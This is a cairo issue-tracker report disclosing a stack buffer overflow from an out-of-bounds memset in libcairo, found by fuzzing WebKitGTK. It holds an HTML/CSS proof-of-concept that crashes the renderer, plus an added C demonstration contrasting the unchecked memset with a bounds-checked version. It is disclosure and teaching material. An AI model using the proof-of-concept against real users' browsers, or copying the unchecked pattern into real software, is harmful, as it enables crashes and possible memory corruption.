cairo / Issues / #341
Closed
Issue created Oct 08, 2018 by dwfault@dwfault

Out-of-bounds memset in libcairo results in stack buffer overflow

Hello, I found a bug that could result in a stack buffer overflow in libcairo. This bug was found in the process of fuzzing WebKitGTK. This bug was originally found in cairo-1.14.8, but it is also reproducible with the recent git commit 06ef6db9.

```html
<!-- PoC as posted with the report. The onload handler resizes the textarea
     through the id-named global `ta`. `<textarea id="ta"/>` is kept as posted:
     textarea is not a void element, so an HTML parser ignores the slash and
     treats it as an opened element. -->
<style>
  #da {
    border-left: solid 1em;
    border-top-left-radius: 27vmin;
    border-bottom-style: double;
  }
  #ta {
    font-family: 'Calibri';
  }
  :root {
    -webkit-border-end: solid 1px;
    column-width: 1px
  }
</style>
<script>
  function js() {
    ta.cols = 38;
  }
</script>
<body onload=js()>
  <dialog id="da"><textarea id="ta"/></dialog>
</body>
```

cairo-rectangular-scan-converter.c:

The function generate() calls render_rows(), and _cairo_image_spans_and_zero() is what actually gets called. With the provided PoC, it is called 5 times before the process crashes; the last call overflows the buffer and overwrites the stack canary. (With some untrimmed PoCs, the written content also overwrites the return address on the stack.)

_cairo_image_spans_and_zero() writes zeros to the stack, but the root cause of the crash could reside in the logic of the function generate(). Thus, besides DoS, other unspecified effects could also exist. This bug was found by ADLab of Venustech.

Edited Nov 05, 2018 by dwfault
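The shape of the bug described in the report, as an added illustrative example that is not cairo's code: a span renderer whose mask buffer lives in a fixed-size stack frame is zeroed with a length derived only from the row arguments, never from the buffer's size, so a request starting far enough above the extents runs the zeros over the canary and the saved return address. The hardened variant beside it bounds the request by what the buffer can hold and refuses anything larger. The types span_renderer_t and frame_t, the functions zero_rows_unchecked and zero_rows_checked, and the buffer geometry are all assumptions made for this demo and do not correspond to cairo's actual structures.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed geometry for the demo: MASK_ROWS rows of MASK_STRIDE bytes.
 * Real cairo sizes differ; these values are not taken from the project. */
#define MASK_STRIDE 64
#define MASK_ROWS   8
#define MASK_BYTES  (MASK_STRIDE * MASK_ROWS)

#define CANARY_VALUE 0xDEADBEEFu
#define RET_VALUE    0x4141414141414141ull

/* Model of the stack frame that owns the mask: the buffer is followed by a
 * stack-protector canary and a stand-in for the saved return address.
 * Keeping all three inside one object keeps the overflow defined behaviour
 * for the demonstration; a real frame offers no such guarantee. */
typedef struct {
    uint8_t  mask[MASK_BYTES];
    uint32_t canary;
    uint64_t saved_ret;
} frame_t;

/* Hypothetical renderer state: the vertical extents the mask should cover. */
typedef struct {
    int extents_y;      /* first row covered by the mask */
    int extents_height; /* rows covered by the mask (== MASK_ROWS here) */
} span_renderer_t;

static void frame_init(frame_t *f)
{
    memset(f->mask, 0xAA, sizeof f->mask);
    f->canary = CANARY_VALUE;
    f->saved_ret = RET_VALUE;
}

int canary_intact(const frame_t *f)
{
    return f->canary == CANARY_VALUE && f->saved_ret == RET_VALUE;
}

/* Bytes the unchecked path zeroes for a request starting at row y: derived
 * only from the distance to extents_y, never from the buffer size. */
size_t unchecked_zero_len(const span_renderer_t *r, int y)
{
    if (y >= r->extents_y)
        return 0;
    return (size_t)(r->extents_y - y) * MASK_STRIDE;
}

/* Vulnerable shape: trust the computed length and memset from the start of
 * the mask. Once y is far enough above extents_y, len exceeds MASK_BYTES and
 * the zeros continue over the canary and the saved return address. */
void zero_rows_unchecked(frame_t *f, const span_renderer_t *r, int y)
{
    size_t len = unchecked_zero_len(r, y);
    if (len > sizeof *f)
        len = sizeof *f;  /* clamp only so the model stays inside its own object */
    memset(f, 0, len);    /* runs past f->mask whenever len > MASK_BYTES */
}

/* Hardened shape: bound the request by the rows the buffer holds and refuse
 * anything larger instead of memsetting it. */
int zero_rows_checked(frame_t *f, const span_renderer_t *r, int y)
{
    if (y >= r->extents_y)
        return 0;
    if (r->extents_y - y > MASK_ROWS)
        return -1;  /* caller must treat this as an error, not partial success */
    memset(f->mask, 0, (size_t)(r->extents_y - y) * MASK_STRIDE);
    return 0;
}

/* Drive one request through the unchecked path; returns 1 if the frame survived. */
int run_unchecked(int y)
{
    span_renderer_t r = { .extents_y = MASK_ROWS, .extents_height = MASK_ROWS };
    frame_t f;
    frame_init(&f);
    zero_rows_unchecked(&f, &r, y);
    return canary_intact(&f);
}

/* Drive one request through the checked path; returns its status and stores
 * whether the frame survived in *intact. */
int run_checked(int y, int *intact)
{
    span_renderer_t r = { .extents_y = MASK_ROWS, .extents_height = MASK_ROWS };
    frame_t f;
    frame_init(&f);
    int rc = zero_rows_checked(&f, &r, y);
    *intact = canary_intact(&f);
    return rc;
}

int main(void)
{
    int intact;
    printf("y=4  unchecked: frame intact=%d\n", run_unchecked(4));
    printf("y=-4 unchecked: frame intact=%d\n", run_unchecked(-4));
    int rc = run_checked(-4, &intact);
    printf("y=-4 checked:   rc=%d frame intact=%d\n", rc, intact);
    return 0;
}
```

The check in zero_rows_checked is the minimal guard for the memset itself; as the report notes, the real root cause may sit in the caller's logic (generate() producing a row range the renderer was never sized for), in which case the fix belongs there and the bounds check is the last line of defence rather than the repair.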